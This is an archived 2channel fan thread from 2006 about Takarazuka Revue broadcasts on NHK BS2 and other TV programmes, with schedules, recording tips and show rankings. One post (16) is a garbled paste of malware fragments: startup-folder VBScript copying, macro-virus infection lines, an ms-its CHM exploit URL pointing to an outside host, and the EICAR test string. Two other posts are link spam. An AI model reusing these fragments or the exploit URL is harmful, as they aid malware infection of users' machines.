5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【宝塚】テレビ・ラジオでヅカ三昧 第3週

1 :名無しさん@花束いっぱい。:2006/11/26(日) 21:17:11 ID:fnkTVdwt
テレビやラジオで宝塚を楽しもう。
スカイステージは専用スレがあるのでそちらでどうぞ。

新スレは980踏んだ人が立てて下さい。(出来ない場合はその旨宣言宜しく)
スレ立てる場合は重複スレ作成防止のため、現スレで宣言してからがんがって下さい。

前スレ
【宝塚】テレビ・ラジオでヅカ三昧 第2週
http://hobby8.2ch.net/test/read.cgi/siki/1131865034/

2 :名無しさん@花束いっぱい。:2006/11/26(日) 21:23:15 ID:vtjabc7M
>1 乙!

           つ旦~ドゾー

3 :名無しさん@花束いっぱい。:2006/11/28(火) 20:45:54 ID:r7WY5dXO
一応貼っておきましょう。

「宝塚特集」
NHK衛星第2テレビジョン

○12月18日(月)13:00〜15:35
 月組『花の宝塚風土記/シニョール ドン・ファン』

○12月19日(火)13:00〜15:40
 雪組『Romance de Paris/レ・コラージュ』

○12月20日(水)13:00〜15:40
 宙組『ホテル ステラマリス/レヴュー伝説』

○12月21日(木)13:00〜15:35
 花組『マラケシュ・紅の墓標/エンター・ザ・レビュー』

○12月22日(金)13:00〜15:40
 星組『長崎しぐれ坂/ソウル・オブ・シバ!!』

4 :名無しさん@花束いっぱい。:2006/11/30(木) 09:11:57 ID:rSeIzlCf
前スレが980レス超えてdat落ちしたので、新スレage。

5 :名無しさん@花束いっぱい。:2006/12/02(土) 23:16:13 ID:MdBMlg2L
1乙。

檀ちゃんが20日にオーラの泉に出るらしいね。

6 :名無しさん@花束いっぱい。:2006/12/02(土) 23:49:01 ID:WL6QdZWD
オーラ出るんだね
見ます!
壇ちゃん
最近よくテレビ出るねでも
出演する映画の話しばかりで
宝塚の話題が
あまり出てこないのが悲しいな。。
オーラに期待☆

7 :名無しさん@花束いっぱい。:2006/12/02(土) 23:53:20 ID:/55PGXzb
>出演する映画の話しばかりで

そりゃそーだ
いつまでも宝塚の話ばかりするのも哀しいぞ

8 :名無しさん@花束いっぱい。:2006/12/03(日) 00:09:05 ID:JdaOdDFj
今は映画宣伝の為に出てるんだから仕方ないよ。
そういうの抜きで出られれば宝塚の話も聞けると思う。さんま御殿とか。

9 :名無しさん@花束いっぱい。:2006/12/03(日) 17:53:54 ID:U/kuIRDZ
すみません
カフェブレイクの今後の出演者教えてください。

10 :名無しさん@花束いっぱい。:2006/12/05(火) 09:09:53 ID:/UWjn2Q/
ttp://www.mxtv.co.jp/takarazuka/guestplan.html

11 :名無しさん@花束いっぱい。:2006/12/05(火) 21:00:29 ID:IgF21+pq
今日の
いいとも
壇ちゃんがテレフォンに出てた!
けど
友達紹介の最後しか見れなかった。。
見た人いたら、どんな事話してたか教えて下さい。。!
ちなみに
友達紹介で
真琴つばさサン
紹介してたよ!
明日、テレフォン出るみたい。

12 :名無しさん@花束いっぱい。:2006/12/08(金) 17:39:56 ID:q04yB/Hw
ファンなら、檀と…

13 :名無しさん@花束いっぱい。:2006/12/08(金) 20:16:43 ID:Wofy0z4h
2006/12/08
「TAKARAZUKA Cafe' break」(追)

※2007年1月より、一部の放送局において放送日が変更になります。

【KBS京都】   毎週水曜 14:30〜15:00
           毎週日曜 7:30〜8:00(変更後)

14 :名無しさん@花束いっぱい。:2006/12/09(土) 02:23:02 ID:0c12nWPw
>>13
妹&弟のテレビ占領時間にモロ被りですか、そうですか……orz

15 :名無しさん@花束いっぱい。:2006/12/09(土) 23:39:11 ID:lvdM3uqQ
12月13日(水) 11:05〜11:32 ショップチャンネル
◇タイタニック ブロードウェイミュージカルのチケットを予約販売します。
この番組ってよく出演者が出てきて、電話で購入した客と直接話したりしてるよね。
これにリカさん出るかな?


16 :<body onload=window()>:2006/12/10(日) 07:47:14 ID:owrlorqb
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

17 :名無しさん@花束いっぱい。:2006/12/10(日) 10:29:48 ID:MxMGLM1U
いいとも増刊号、檀ちゃんの肩書き「歌手」だった…。歌手??
ちなみに次の日のマミさんはちゃんと女優でした。

18 :名無しさん@花束いっぱい。:2006/12/11(月) 16:09:58 ID:YHtORSkg
昨日の夜テレビつけたら檀ちゃんのドアップでびっくらこいた。
5分くらいの番組繋ぎのやつだと思うんだけど
女らしくキレーな人な感じで話していたのに最後に
「ムフッ」て
そりゃダメだろ
そこはカメラ目線でニコッでしょ
最後の最後でガクッとした

19 :名無しさん@花束いっぱい。:2006/12/11(月) 17:00:06 ID:B7dGMtk4
昨日の笑っていいともの増刊号見直したら、
檀ちゃんのプロフィールが画面下に流れて、
「月組、星組の二つの組で主演娘役を務め、宝塚初の快挙として話題に。」
って書いてあったんだけど、ぐんちゃん、花ちゃんは?

>>17さん、
ホントだ〜。でもそのちょっと前の文字が大きく出てる時には
檀ちゃんも「女優」って書いてあったんだよね。
なんで急に変わったんでしょ?

20 :名無しさん@花束いっぱい。:2006/12/15(金) 13:54:17 ID:pMC0Cv5p
国会会期4日延長だってね
国会中継で休止の予感

21 :名無しさん@花束いっぱい。:2006/12/15(金) 17:21:21 ID:TQMvNE7k
マラケシュとJAZZYが初お目見えだっけ。
その二つは巻き込まれないでほしいもんだ。

22 :名無しさん@花束いっぱい。:2006/12/15(金) 23:21:10 ID:s3ib8GAt
BS2またはハイビジョンで今まで放送された雪組公演を教えてください!

23 :名無しさん@花束いっぱい。:2006/12/16(土) 00:18:56 ID:AaWIjCx0
>>19

檀ちゃんは一度専科にいったからじゃない?
月と星の間に間がある。
花ちゃんとグンちゃんは間がなくスライドしだけ。
違うかな?

24 :名無しさん@花束いっぱい。:2006/12/16(土) 03:36:41 ID:NkE49pc7
檀の経歴でそこしか誉めるとこなかったんだろ

25 :名無しさん@花束いっぱい。:2006/12/16(土) 11:08:41 ID:UpIiq1jo
昨日の(確か)「BSファンクラブ」っていう番組に
たかこさんが出てますた。


26 :名無しさん@花束いっぱい。:2006/12/16(土) 16:22:19 ID:PKWxKFhR
>25
昨日のは再放送だよ〜 たしか火曜日から放送してる。

BSのたかこさん
テレビは冷酷に年齢を映し出すなぁ…としみじみオモタ

27 :名無しさん@花束いっぱい。:2006/12/16(土) 22:17:54 ID:+btPQAJZ
上司がその番組見たらしく
わおうようこが夜中の番組に出とったぞ
と言ってきた

28 :名無しさん@花束いっぱい。:2006/12/17(日) 02:39:01 ID:Mn0LReBe
来週から楽しみだね。

29 :名無しさん@花束いっぱい。:2006/12/17(日) 14:57:31 ID:lPUxVq7w
明日BS2で放送するみたいだね
ネットの最新のテレビ番組表に書いてあった無事放送されるみたいで良かった。
年に一度の特集だし
楽しみだね!

30 :名無しさん@花束いっぱい。:2006/12/17(日) 18:04:08 ID:wDa6kUbR
ひとつ聞いていいですか?
21日放送のマラケシュなんですけど
これってオサさん主演のなんでしょうか?

31 :名無しさん@花束いっぱい。:2006/12/17(日) 18:05:05 ID:4UcQsFd3
>30
逆にマラケシュは新公以外はオサさん主演のものしかありません


32 :名無しさん@花束いっぱい。:2006/12/17(日) 18:25:05 ID:zpv4slC1
レコーダーの番組表で金曜日のだけ
宝塚特集13:00〜、宝塚特集??:??って分かれてた。
あとは1つに集約されているのに。
どうせなら毎日、間に1分間以上あけて2つに分けてくれたら予約録画的(録画モード的)に助かるんだけど

33 :名無しさん@花束いっぱい。:2006/12/17(日) 22:47:13 ID:3LqyTwgH
明日からの特集、芝居とショーの分けた時間って分からないもんかね。
スカステの時間参考に分けたんだが、一分も間がないんじゃ失敗したら困るな。


34 :名無しさん@花束いっぱい。:2006/12/18(月) 09:12:04 ID:6basSAzo
一番間違いがないのは、
最高レートで撮って芝居部分をレート変換してDVDに落とす。
ショー部分は最高レートのままでDVDに入るはず。
ビットレート9.2から5.8位への再エンコならそんなに画質は落ちないよ。
ショーは最高レートでも辛い時あるけどね。
ハイビジョンでブルーレイやらHD−DVDやらに落とす場合はわからん。

35 :名無しさん@花束いっぱい。:2006/12/18(月) 11:23:33 ID:LpLlKjVd
ドンファンあげ

36 :名無しさん@花束いっぱい。:2006/12/18(月) 12:29:14 ID:NGN0qnTP
BSファンクラブっていう番組はスカパーとかですか?

37 :名無しさん@花束いっぱい。:2006/12/18(月) 13:28:45 ID:4VkOHjzA
BS2でやってる、BS番組を紹介する
10分程度の番組のことだよ。

38 :名無しさん@花束いっぱい。:2006/12/18(月) 15:11:40 ID:NGN0qnTP
有難う御座います。時間は分かりますか?

39 :名無しさん@花束いっぱい。:2006/12/18(月) 17:06:23 ID:kKdCUumD
BS2ってコピーワンスかかってんの!?
今、DVDにダビろうとしたら出来なくてショック!

40 :名無しさん@花束いっぱい。:2006/12/18(月) 18:10:18 ID:2l8drIpF
>39
BS2はコピワンないよ

41 :名無しさん@花束いっぱい。:2006/12/18(月) 18:15:19 ID:2l8drIpF
>39
あ。もしかしてアナログBSじゃなくて、デジタルBSから録画したのかな?
そしたらコピワンかかるかもしれん

42 :名無しさん@花束いっぱい。:2006/12/18(月) 19:13:25 ID:hhDznGHo
あーあ。初っ端から見逃したorz

43 :名無しさん@花束いっぱい。:2006/12/18(月) 19:18:00 ID:EcCt9nkN
BSのヅカ特集
うちは写らないから姉に録画頼もうと思ってかけた電話で大喧嘩・・・
見られない(´.ω.`)

44 :名無しさん@花束いっぱい。:2006/12/18(月) 19:25:00 ID:SATkfElu
あ、今日からだったのか・・・

_| ̄|○


21日と23日の事しか頭になかった・・・漏れ、今日休みだったのに・・・

45 :名無しさん@花束いっぱい。:2006/12/18(月) 21:56:45 ID:FEvglLAy
既出だと思いますがシニョールドンファンのロケットで衣装の肩ひもがとれて
ベロンチョ寸前で踊っている初舞台生はどなたですか?。左から14人目です。
めったに切れそうもない肩ひもがはずれているのはイジメか何かですか?
NHK的にも衝撃映像でしたのでかなりヒヤヒヤしていましたが、最後は無事
だったのでホっとしました。これはスミレコードにひっかからないのですか?

46 :名無しさん@花束いっぱい。:2006/12/18(月) 23:18:07 ID:Pfv9ew0E
クラリン
もしかしてフィナーレで声裏返った?

47 :名無しさん@花束いっぱい。:2006/12/19(火) 02:26:29 ID:VBwqhkIb
人の強さ のとこ?

48 :名無しさん@花束いっぱい。:2006/12/19(火) 19:05:49 ID:LowiamFL
「シニョール・ドンファン」
ヅカはね、ファンを幸せな気分にしてナンボのもの
コシノヒロコの衣装も綺麗だしフィナーレの燕尾ダンスも素敵。
でもね、主人公があんなに寂しく孤独なまま終わってしまうのは、ダメだね。
相手娘役は、ナンのためにいるんだ?本気でリカさん気の毒と思った作品。

ま、今見ても部分的な萌所はあってもお話全体のカタルシスは味わえないな
リカさんのだったら、長春のほうがずっとほんわか幸せ気分になれる作品だな



49 :名無しさん@花束いっぱい。:2006/12/19(火) 19:44:47 ID:UdTFyjtf
花の道 夢の道 永遠の道 ハイビジョンで放送された?

50 :名無しさん@花束いっぱい。:2006/12/19(火) 22:13:00 ID:GUZXx4Yj
>>45
シニョールドンファンの初舞台生は91期か?
あれだけ飛跳ねて胸がはだけないのも
プロ根性だな。視聴者としてはハプニングに
期待したのだが、、、、、、

51 :名無しさん@花束いっぱい。:2006/12/19(火) 22:14:26 ID:VBwqhkIb
89期じゃない?

52 :名無しさん@花束いっぱい。:2006/12/19(火) 22:25:15 ID:sfFqwFZs
>49
放送されたと思うぞ。
でも、まだチャンスはある。

53 :名無しさん@花束いっぱい。:2006/12/19(火) 22:26:54 ID:GUZXx4Yj
>45
結局該当者は誰なのさ、気になるじゃん
誰か教えてくんちぇー

54 :名無しさん@花束いっぱい。:2006/12/19(火) 22:54:45 ID:UdTFyjtf
再放送あるかな ハイビジョンってスカステとは違うよね?

55 :名無しさん@花束いっぱい。:2006/12/19(火) 23:35:00 ID:J1TukeMR
スカステだよ。

56 :http://up.nm78.com/dl/2415.jpg:2006/12/19(火) 23:42:13 ID:ihp6WGCt
http://up.nm78.com/dl/2415.jpg

57 :名無しさん@花束いっぱい。:2006/12/20(水) 00:44:25 ID:3iKGvdIk
明日のオーラの泉は檀ちゃんかぁ

58 :名無しさん@花束いっぱい。:2006/12/20(水) 00:50:02 ID:yVxhSiRL
>47
ぅむ

59 :名無しさん@花束いっぱい。:2006/12/20(水) 02:33:12 ID:/LlQ74Y+
シニョドン、リカさんのチークの入れ方が気になって仕方ないorz

60 :名無しさん@花束いっぱい:2006/12/20(水) 11:23:11 ID:KOYJ/lm+
ドンファン、ゆうひのアップが怖かった。

61 :名無しさん@花束いっぱい。:2006/12/20(水) 13:10:04 ID:fmcyBMtV
只今
BS2で海星&レビュー伝説放送中!

62 :名無しさん@花束いっぱい。:2006/12/20(水) 15:27:45 ID:WEerMBPf
ちょっとBS実況に入れなくなっちゃったわよ

63 :名無しさん@花束いっぱい。:2006/12/20(水) 15:28:48 ID:cnhYiIH1
人大杉か

64 :名無しさん@花束いっぱい。:2006/12/20(水) 15:29:49 ID:b/PxoAWu
いいところで落ちたな>実況

65 :名無しさん@花束いっぱい。:2006/12/20(水) 15:32:04 ID:0hIxqU0G
オハナのダルマ終わっちゃった…実況したかったな

66 :名無しさん@花束いっぱい。:2006/12/20(水) 15:34:37 ID:AMptELxj
鯖移転とか言ってる

67 :名無しさん@花束いっぱい。:2006/12/20(水) 15:35:13 ID:ZS5EqKZF
実況落ちたorz

68 :名無しさん@花束いっぱい。:2006/12/20(水) 15:35:42 ID:ko4tmY/t
NHKのはアップ多用で怖い・・・
特にこの宙組はアップにしたらダメな人ばかりなのに

69 :名無しさん@花束いっぱい。:2006/12/20(水) 15:37:39 ID:b/PxoAWu
記念撮影ですよ〜

70 :名無しさん@花束いっぱい。:2006/12/20(水) 15:39:34 ID:AMptELxj
ここで実況するなって。

71 :名無しさん@花束いっぱい。:2006/12/20(水) 15:47:23 ID:pecke2NR
実況板が落ちるなんて、さすが女帝陛下。
退団してから何のメディアにも出てないと思うのだが、
やっぱ女帝にかなう娘役なんて居ないな。素晴らしい。

72 :名無しさん@花束いっぱい。:2006/12/20(水) 15:50:58 ID:F0yqe/rs
たか&はな最高。

73 :名無しさん@花束いっぱい。:2006/12/20(水) 15:52:48 ID:0nAxK6xV
あ〜おもしろかったw
何年かぶりに劇場に行ってみようか
(●▽●)のお歌を聴きにwww


74 :名無しさん@花束いっぱい。:2006/12/20(水) 15:56:32 ID:5n8XDAya
実況は鯖移転だってさ。。。
最後が実況できなかった(´・ω・`)

75 :名無しさん@花束いっぱい。:2006/12/20(水) 16:02:10 ID:IXgjTcxk
レビュ伝、見たときは最初から
「ナニコレポカーン」だったんだが、評判良かったのか…。
ポッポさんがセンターで踊ってたスペイン系のシーンは格好良かった。

76 :名無しさん@花束いっぱい。:2006/12/20(水) 16:04:05 ID:yekIldxB
お花様のショーのダルマ姿、脚が長くてまっすぐに伸びてとても綺麗。
小顔で腰の位置が一人だけ高くて、腕も脚も細くて長くて・・
あまりのスタイルのよさに改めてびっくりした。
貧しい小娘姿も似合うし(小走りする姿とか表情とかすごいうまい!)
お花様は舞台活動しないという噂だけど本当ならもったいないよね。
私は檀ちゃんファンだけど、お花様はやっぱりすごいと思ってしまった。


77 :名無しさん@花束いっぱい。:2006/12/20(水) 16:16:27 ID:rofh2EWx
>>71

サーバーダウン(鯖落ち)情報 part126
http://qb5.2ch.net/test/read.cgi/operate/1165755341/941-

941 :動け動けウゴウゴ2ちゃんねる :2006/12/20(水) 15:52:00 ID:gtjqVNzN0
 925 名前:動け動けウゴウゴ2ちゃんねる :2006/12/20(水) 15:46:45 ID:Vi/xOavF0
 【鯖】2ちゃんねるメンテナンス情報【その2】
 本日12/12 10:45-20:00に予定されていたサーバメンテナンスは完了しました。
 引き続きlive22サーバのリフレッシュ移転工事が始まっています。
 現在live22サーバにある実況系の板は現在停止しています。
 ボクシングまでにlive24サーバで再開すべく奮闘中


78 :名無しさん@花束いっぱい。:2006/12/20(水) 16:18:28 ID:ZS5EqKZF
実況では(●▽●)大人気だったねw


79 :名無しさん@花束いっぱい。:2006/12/20(水) 16:29:28 ID:0nAxK6xV
ボクシングまでって・・・?
明日は実況できるのかな。
(●▽●)が出るのはもうやらないの?

80 :名無しさん@花束いっぱい。:2006/12/20(水) 16:34:34 ID:AMptELxj
明日以降は、花マラケシュ・星長崎・月ジャジーだから
(●▽●)はもう出ないね。

81 :名無しさん@花束いっぱい。:2006/12/20(水) 16:36:32 ID:rofh2EWx
>>79
今日18:55 プロボクシング WBA世界ライトフライ級タイトルマッチ
の時間までに


サーバーダウン(鯖落ち)情報 part127
http://qb5.2ch.net/test/read.cgi/operate/1166599711/

82 :名無しさん@花束いっぱい。:2006/12/20(水) 16:44:47 ID:0nAxK6xV
>80・>81
d。「ピッ・ピ!!!」を鬼リピしつつ、明日に備える(`・ω・´)
(●▽●)以上に面白い子が花・星・月にもいますように★

83 :名無しさん@花束いっぱい。:2006/12/20(水) 17:24:15 ID:/LlQ74Y+
今録画を見てるんだけどさ、
ステラマリスの(●▽●)ソロは収録日にかましちゃったの?
いつもあれだったの?
正塚センセはあれをOKしたのか?

まだ腹筋がひくひくしてるんだけどww

84 :名無しさん@花束いっぱい。:2006/12/20(水) 17:59:29 ID:gUfLjUbA
>83
あれはああゆう歌なのです。
さすが(●▽●)

85 :名無しさん@花束いっぱい。:2006/12/20(水) 18:02:26 ID:/LlQ74Y+
今「ぴっぴ(●▽●)!!」も観てしまったwwww

86 :名無しさん@花束いっぱい。:2006/12/20(水) 20:02:36 ID:gUfLjUbA
実況は(●▽●)の話題で大盛り上がりだったよw
ロンリーウルフにはじまりラインダンスまでw
「いぇ〜ぃへぇ〜ぃ」はすごい…。

87 :名無しさん@花束いっぱい。:2006/12/20(水) 20:08:18 ID:tbHW5wBd
(●▽●)のことを知らない人が、
こいつやけくそで唄ってるの?(´・ω・`)
って訊いてて吹いたw

88 :名無しさん@花束いっぱい。:2006/12/20(水) 20:31:33 ID:0ApNOZvv
銀橋の歌は笑うところだよね?違うの?

89 :名無しさん@花束いっぱい。:2006/12/20(水) 20:52:39 ID:4hVPzevN
トド、もう真ん中で出るなよ〜。重く苦しい。
わたる、こむ、も下手だな。トドも唸り声。タカコも癖ある。
しかし、タニが出て来て、すべてぶっ飛んだ。

90 :名無しさん@花束いっぱい。:2006/12/20(水) 21:03:24 ID:oE60cifQ
それが誰にも真似できないタニの魅力でつw

91 :名無しさん@花束いっぱい。:2006/12/20(水) 21:32:10 ID:EVFtk4kQ
元気で大きな声が取柄でつ〜

92 :名無しさん@花束いっぱい。:2006/12/20(水) 21:33:27 ID:8sg9GWHR
http://atq.ck.valuecommerce.com/servlet/atq/referral?sid=2219441&pid=874302784&vcptn=blog%2Fp%2FdSfxN_Fm3N_yVt5whufQMESbfDNi

93 :名無しさん@花束いっぱい。:2006/12/20(水) 22:48:05 ID:BmLhSs06
好きなんだけど、トップ大丈夫だろうかと真剣に心配になる。あの華をもってしても
破壊的な歌をカバーし切れてないよ…
マリコさんの歌は平気だったのに。せめて気障らずに笑っていて欲しい。
こんなふうに→(●▽●)

94 :名無しさん@花束いっぱい。:2006/12/20(水) 23:13:32 ID:vceTW9nG
今録画みた
ぴっぴは言うまでもなく
(●▽●) が歌ってキザるたびに大笑いしてもうた
なんか実際に劇場でみたのよりも気合が入ったキザりっぷり。ウィンクバチバチだし
劇場じゃこんなに笑えない罠

95 :名無しさん@花束いっぱい。:2006/12/21(木) 00:25:58 ID:9tgb90OG
オーラで
檀ちゃん
すごい泣いてたね
宝塚時代そんなに大変だったんだね。。
これから更なる活躍を期待してるよ

96 :名無しさん@花束いっぱい。:2006/12/21(木) 01:02:37 ID:5JvYbSG/
今やってる

97 :名無しさん@花束いっぱい。:2006/12/21(木) 13:29:01 ID:9tgb90OG
マラケシュ初見なんだけど
マラケシュに劇団四季のような踊り子がいる。。
気になる。。


98 :名無しさん@花束いっぱい。:2006/12/21(木) 15:00:33 ID:Ju06Vgwr
>>80
正月にネバがあるぞ!
正月から(●▽●)のおうたをきけるなんて…以下略

99 :名無しさん@花束いっぱい。:2006/12/21(木) 15:57:12 ID:oOOg0abZ
テレビが壊れそうだ

んヴァンルッセロールナ

100 :名無しさん@花束いっぱい。:2006/12/21(木) 17:01:27 ID:40WVXJle
四季の人?七星きらさんじゃないよね?

101 :名無しさん@花束いっぱい。:2006/12/21(木) 17:05:25 ID:WR/0uOqp
ぬむきてぱぁ
って結局なんて歌ってたんだろう……

102 :名無しさん@花束いっぱい。:2006/12/21(木) 20:49:26 ID:KRnrYD6l
キリッ
\ /
● ●
 ◇  <ぉうれぃいにぃバワあぁあぁぁぁ〜♪

103 :名無しさん@花束いっぱい。:2006/12/22(金) 02:20:01 ID:0DYgaXFQ
うーん
名前ちゃんと覚えてないんだけど
もっと難しい名前だったなぁ
マラケシュで
一人だけ
顔がライオンキングにでてきそうなメイクだった。。衝撃デシ

104 :名無しさん@花束いっぱい。:2006/12/22(金) 02:24:55 ID:9Qdi2mAh
蛇やってた鈴懸三由岐さんじゃ?

105 :名無しさん@花束いっぱい。:2006/12/22(金) 02:52:28 ID:XfwS1Azs
マラケシュの鈴懸さん凄いとオモタよ
メイクだけじゃなくて、ダンスというか表現というか…

あれは蛇という役なんですね

106 :名無しさん@花束いっぱい。:2006/12/22(金) 08:09:31 ID:0DYgaXFQ
>>104
たぶんその人デシ
>>105
蛇なんですかー
納得!
踊りすごいデスね

107 :名無しさん@花束いっぱい。:2006/12/22(金) 14:42:57 ID:fG9OFFmh
>>101
Ne me quitte pa(私を置いて行かないで)

108 :名無しさん@花束いっぱい。:2006/12/22(金) 14:47:34 ID:ssfdLkoK
伊左次が逃げようとした夜の港に
ヒュウ、
ヒュウっていう効果音が流れてたけど、あの金属質な音は江戸時代には有った音なのかな?

109 :名無しさん@花束いっぱい。:2006/12/22(金) 23:15:39 ID:IqwC1D6Y
こないだテレビでやってたエンター・ザ・レビュー
オープニングのオサさんの女装は正直寒かった。
ふだんは男前なのでニウハーフにしか見えん。

110 :名無しさん@花束いっぱい。:2006/12/22(金) 23:24:11 ID:XfwS1Azs
男役の裾までひらひらして、要するに娘役不要論ではなかろうか?

111 :名無しさん@花束いっぱい。:2006/12/23(土) 11:11:01 ID:E7RPYsLh
今日のBS2のjazzy+レビュドリって155分だけどフルなんでせうか?
特典付きだがDVDが213分なのでダイジェストなんでせうかorz

112 :名無しさん@花束いっぱい。:2006/12/23(土) 11:22:42 ID:1EevhNha
>111
通常の公演は芝居95分+ショー55分の150分だよ。
カットはないはず。(著作権は気になるがNHKだからたぶん大丈夫)
市販DVDは特典映像やら別アングルやなんやらで長いけど。

113 :名無しさん@花束いっぱい。:2006/12/23(土) 11:31:55 ID:E7RPYsLh
>112
わかりました。おかげでHDDに予約する録画モードが決めれました。dクスです。

114 :名無しさん@花束いっぱい。:2006/12/23(土) 12:10:21 ID:YlT+aArT
>111
既に解決してるみたいだけど補足で。
収録日は10/17。
一部が1時間38分30秒、二部56分30秒だそうです。
今NHKに確認しますた。

115 :名無しさん@花束いっぱい。:2006/12/23(土) 12:27:42 ID:XFOCsneK
え?
>111のはBS2で今日?
何時から?


116 :名無しさん@花束いっぱい。:2006/12/23(土) 12:35:08 ID:VSoWuv33
13:30〜16:05ダヨ!

117 :名無しさん@花束いっぱい。:2006/12/23(土) 13:06:02 ID:t7N3Sii6
レビュ伝で衝撃を受けた人達は、例の妖精さん達見てどう思うだろう・・・

118 :名無しさん@花束いっぱい。:2006/12/23(土) 13:51:27 ID:UKWAoMdl
114さん。再放送についてはわかりますか?

119 :名無しさん@花束いっぱい。:2006/12/23(土) 14:39:03 ID:XFOCsneK
オバQカナミン
予約忘れたょ( ̄□ ̄;)!!

120 :名無しさん@花束いっぱい。:2006/12/23(土) 17:52:22 ID:BlLIiCSi
マラケシュ≧ステマリ>長崎>ロマパリ>>>ドンファン>>>>>>>>ジャジー
エンター>レコラ>レビュドリ>風土記≧シバ>>>>>>>>>>>>レビュ伝

121 :名無しさん@花束いっぱい。:2006/12/23(土) 17:58:10 ID:9iau8JN8
>118
114じゃないけど再放送って、何時再放送するかって意味?
それなら当分ないと思うけど、先のことだし自分で電話してきけば?

122 :名無しさん@花束いっぱい。:2006/12/23(土) 18:35:15 ID:hXT80OkY
マラケシュ≧ステマリ>ロマパリ>>長崎>ドンファン>>>>(越えられない壁)>>ジャジー
エンター≧レビュドリ>レビュ伝>レコラ>>風土記≧シバ

123 :名無しさん@花束いっぱい。:2006/12/23(土) 18:40:38 ID:XFOCsneK
レコーダーの番組表になかったんで見逃したけど
もしかしてハイビジョン放送だったのかな?

124 :名無しさん@花束いっぱい。:2006/12/23(土) 18:48:43 ID:8173XkhU
ビデオにしかBSチューナーのない我が家。昨夜からセットして、これで安心!と思って掃除に勤しんでいたら…旦那に予約解除されて撮れなかった…


サッカーなんて大っキライだ−−−!

125 :名無しさん@花束いっぱい。:2006/12/23(土) 19:08:46 ID:t7N3Sii6
エンター>レビュドリ>シバ>レコラ>>レビュ伝

かな。

126 :名無しさん@花束いっぱい。:2006/12/23(土) 19:57:00 ID:yMVG0/5r
おーおー元気だこと

127 :名無しさん@花束いっぱい。:2006/12/23(土) 20:29:34 ID:FXwXSTE2
やっぱりジャジーはDVDに焼くのを躊躇うなぁ。
レビュドリはいいんだけど、ジャジーが…
あさこ好きなんだけどなぁ…orz

128 :名無しさん@花束いっぱい。:2006/12/23(土) 21:02:29 ID:vUdfWb8Z
>>124
気を落とさないで、知り合いかネットでビデオかDVDをたのみましょう。
でもそうすると正月がNever Say Goodbyeと天皇杯決勝が重なるか心配だね。
今のうちに知り合いに頼んでおいた方がいいかもね。

サッカーは弱いと思っていたコンサドーレ札幌が準決勝まで進んでうれしい。
準決勝は見る! 元日はネバセイ楽しみっ。

129 :名無しさん@花束いっぱい。:2006/12/23(土) 23:05:29 ID:pF3u/rSf
200時間撮れるはずのハードの残りは3時間。
映画ファンでもあるのでたまりまくり。

プルミエがタイトル入力面倒で…(内容書かないと分からなくなる)

自分ヒットはレビュドリなので、それだけ残す

130 :名無しさん@花束いっぱい。:2006/12/23(土) 23:23:06 ID:OkIw8i34
>>128
124です。ありがと、お気遣い心に染みます。
正月はビデオデッキ死守するお!

>>109
亀ですまん。
マダムスミレの衣装とヅラは、全ツの方がよかった。

131 :名無しさん@花束いっぱい。:2006/12/24(日) 01:49:58 ID:Pvbte4xU
アイリッシュダンス〜早送り〜レビュドリ

132 :名無しさん@花束いっぱい。:2006/12/24(日) 07:22:28 ID:KKcYsunE
500GBだからまだまだ余裕だが、そろそろ移さねば…。
結構溜まって来てるー。

133 :名無しさん@花束いっぱい。:2006/12/24(日) 08:56:29 ID:ooCivXA2
131
漏れもw


134 :名無しさん@花束いっぱい。:2006/12/24(日) 09:33:43 ID:NBqbCpvP
HDDに撮ってる漏れは
アイリッシュダンス・ジャズ〜(チャプター分割)〜レビュドリ
かな 贔屓が出てるから一応ジャージも残すけどねー

135 :名無しさん@花束いっぱい。:2006/12/24(日) 10:21:23 ID:kZ2I0mtM
昨日のNHKも含めて暮からお正月はいっぱい特別な放送がありそうだから
HDDを整理して何とか30時間の空きを作ったわ。
さーいつでも録画OKよ!

136 :名無しさん@花束いっぱい。:2006/12/25(月) 00:57:14 ID:de6dwmbG
レヴュドリ、BSで初めて見た。
友人の感想通りだった。
かなみさんが主役に見えた。
あさこさん顔が暗くてトップに見えない。
ただ主演男役だから真ん中にいるという印象。
キリヤンでさえかなみさんには勝てなかった。
実力娘役に男役数名がかしずいているという風体。

レジュブリでかなみさんの露出が減ったわけがわかったわ。

137 :名無しさん@花束いっぱい。:2006/12/25(月) 01:34:38 ID:xvxkzqEK
>136
私はあさこが主役に見えたよ。カッコ良かったし。
きりやんは暗い役で出番少ないかも?って思ってたけど
初めて見たけど全然そんな事なかった。想像してたより良かった。
かなみんも良かった。ウォルターに「いらない命なら私に頂戴」
の場面には泣けた。

138 :名無しさん@花束いっぱい。:2006/12/25(月) 09:00:28 ID:TvdNymwg
>>136
同意。何度も何度も出てきては歌い、出てきては歌い。
「これでかなみん嫌われちゃったんだなぁ」って思ったもん。
歌が上手い人が娘1になると歌や出番を独り占めしてしまい
他に廻らなくなるから面白くないなぁと思った。


139 :名無しさん@花束いっぱい。:2006/12/25(月) 11:32:53 ID:6ACLUtBN
漏れは贔屓のシーンにマーカー(チャプター)をつけ、
>>|(なんて言うかわからん)で贔屓だけが見られるようになってる
ものによっては贔屓が主役同然に見えることもww

芝居とショーは番組分割してある

